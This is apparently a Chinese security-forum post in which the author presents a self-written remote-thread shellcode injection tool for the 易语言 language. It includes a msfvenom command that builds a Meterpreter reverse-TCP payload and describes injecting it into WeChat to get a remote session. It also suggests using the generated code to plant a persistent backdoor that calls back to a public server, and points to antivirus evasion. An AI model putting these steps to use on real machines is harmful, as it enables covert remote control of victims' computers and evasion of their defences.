远程线程注入工具 - 可自定义shellcode 可生成注入代码- Track 知识社区 - 掌控安全在线教育

文章转载自《通过听觉入侵你》，由本人原创

本次给大家带来一款本人写的小工具

可自定义shellcode注入任意进程，并且可生产对应的代码给自己的代码调用

这里第二个输入框，可以直接输入msf生成的payload

就会自动转换成易语言可调用的机器码，可以用此来直接注入指定的进程

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.93.131 lport=6666 -f c

直接将生成的shellcode复制进工具里面转换结束后便可以进行注入了

在这里选择需要注入的进程

这里我选择微信，并且点击注入这边msf便成功上线了

双击下面的输入框便会生成线程注入的代码给自己的代码调用

当然了也可以生成利用自身程序给msf反弹shell的代码

选择最下角的选项再双击输入框即可

将生成的代码复制进易语言，然后调用对应的函数便可以实现线程注入了

可以使用此方法在自己的程序中放后门进行一个持久化的控制当然了需要一个公网服务器来接收反弹

直接调用生成的函数程序界面会卡住
可以另开一个线程来执行这段代码
启动线程(&调用此函数)

当然了这里也不仅仅是只可以注入个msf的payload
这里也可以自己提取shellcode 然后进行注入生成

在第一个输入框输入自己提取的shellcode，注意是10进制的，使用半角符的逗号进行区分

这里是手动提取shellcode然后进行注入的截图

这里是我自己写的一个小程序，现在通过易语言的万能特征码 ff 55 fc 5f 5e寻找到了对应的代码区域，现在再进行提取机器码

对提取出来的asm汇编指令进行转换

然后再进行注入，可以看到成功拿到flag 并且再不修改程序代码的情况下利用了本程序在目标进程执行任意代码！

利用生成的代码如果编译后绕过杀毒软件可以看一下下面提供的视频
生成的payload请配合精易模块使用

视频以及工具下载地址